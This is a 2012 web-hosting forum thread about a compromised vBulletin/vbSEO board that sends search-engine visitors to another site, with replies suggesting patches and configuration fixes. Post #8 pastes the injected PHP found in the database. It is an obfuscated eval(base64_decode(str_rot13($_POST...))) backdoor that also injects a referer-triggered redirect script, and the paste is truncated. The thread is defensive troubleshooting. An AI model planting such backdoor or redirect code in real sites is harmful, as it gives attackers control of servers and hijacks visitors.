Results 1 to 12 of 12
Thread: vbulletin/vbseo hacked?
-
02-28-2012, 06:53 AM #1Newbie
- Join Date
- May 2011
- Posts
- 15
vbulletin/vbseo hacked?
Hello,
i have very strange problem with my vbulletin board (3.8.7). The problem is Google Re-Direct clicks to my forum to MyFileStore.com. I read everything on vbseo and vbulletin boards and reinstalled vbseo, which is supposedly causing the problem. But today the problem came back.
Any ideas?
-
02-28-2012, 07:35 AM #2Junior Guru Wannabe
- Join Date
- Feb 2012
- Posts
- 60
Have you tried contacting vb about the issue? There may be a known exploit that they have a security patch for
-
02-28-2012, 11:57 AM #3Web Hosting Master
- Join Date
- Mar 2009
- Location
- Miami, Florida
- Posts
- 20,777
Hello,
Are you sure it is not an issue with your machine? I have seen rogue anti-viruses and adware re-direct google searches. Can you try it on another computer?
-
02-28-2012, 12:06 PM #4Aspiring Evangelist
- Join Date
- Aug 2005
- Location
- behind my screen
- Posts
- 402
this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?
-
02-28-2012, 01:24 PM #5Newbie
- Join Date
- May 2011
- Posts
- 15
-
02-29-2012, 01:49 AM #6Web Hosting Master
- Join Date
- Aug 2011
- Posts
- 719
There is Support section in vbseo. So you can discuss your problem there. I am agree with KMyers. There are some free software and anti virus which re-direct google searches to a particular sites.
-
02-29-2012, 03:40 AM #7Aspiring Evangelist
- Join Date
- Aug 2005
- Location
- behind my screen
- Posts
- 402
hi,
1)check vbulletin.com for security patches
2)temporarly disable custom plugins
3) redirection gone ? good not gone ? well.....
4)you have a problem on the server that needs to be investigated by somebody with full access
-
02-29-2012, 01:09 PM #8Newbie
- Join Date
- May 2011
- Posts
- 15
My admin just found this code in MySQL (datastore, plugins)
Code:if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x); ini_set('display_errors',0);ini_set('log_errors',0); $r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER'); if(strlen($r)>10) { $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip); if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false)) { $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com'); foreach($s as $e) { if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp']))) { $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8)); die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl
Is this related to any known issue?
-
02-29-2012, 01:28 PM #9Aspiring Evangelist
- Join Date
- Aug 2005
- Location
- behind my screen
- Posts
- 402
that is exploit code disable base64_encode and base64_decode PHP functions in php.ini do remember that vBulletin uses those itself on upgrades/installs so you need to renable them if you are going to upgrade/install also "register_globals = off" in php.ini restart the server after editing php.ini the "@" you see before PHP functions calls cause that script to throw no errormessage if the function fails.Also have you seen this
http://www.vbseo.com/f5/vbseo-securi...3/index12.htmlLast edited by cpanellover; 02-29-2012 at 01:35 PM.
-
02-29-2012, 02:55 PM #10Newbie
- Join Date
- May 2011
- Posts
- 15
1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?
2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?
Do i understand that correctly?Last edited by mikewiz; 02-29-2012 at 03:01 PM.
-
02-29-2012, 03:10 PM #11Aspiring Evangelist
- Join Date
- Aug 2005
- Location
- behind my screen
- Posts
- 402
The best thing you can do is contact vBulletin support the creators of the product are the most qualified to tell you howto deal with this.It's possible it comes back but be carefull with the datastore if you do anything wrong it might corrupt your database and your board will stop working.Ask Steve at vbulletin.com he is verry smart with things like this.it might not be vbSeo look here what yui library version are you running ? try in your vBulletin control panel
- Admin CP >> Settings >> Options >> Server Settings and Optimization Options
- Scroll down to Use Remote YUI
- Set this to Google
Last edited by cpanellover; 02-29-2012 at 03:16 PM.
-
03-03-2012, 09:59 AM #12Junior Guru Wannabe
- Join Date
- Mar 2012
- Posts
- 34
Also have a check on your .htaccess file.
It might be vulnerable.
Similar Threads
-
vBSEO and vBulletin
By teck in forum Software & Scripts OffersReplies: 17Last Post: 04-08-2011, 02:18 AM -
vbulletin + vbseo managed hosting.
By IsMaR in forum Managed Hosting and ServicesReplies: 15Last Post: 11-06-2010, 11:22 PM -
vBSEO and vBulletin Owned License for Sale (with +2 years upgrades & vBulletin Blogs)
By NameRegion in forum Software & Scripts OffersReplies: 12Last Post: 11-08-2008, 10:50 AM -
vBulletin + vbSEO + drupal
By vjai in forum Dedicated ServerReplies: 10Last Post: 02-26-2008, 10:37 PM -
vBulletin and vBSEO - best host ?
By vjai in forum Web HostingReplies: 16Last Post: 02-24-2008, 02:15 PM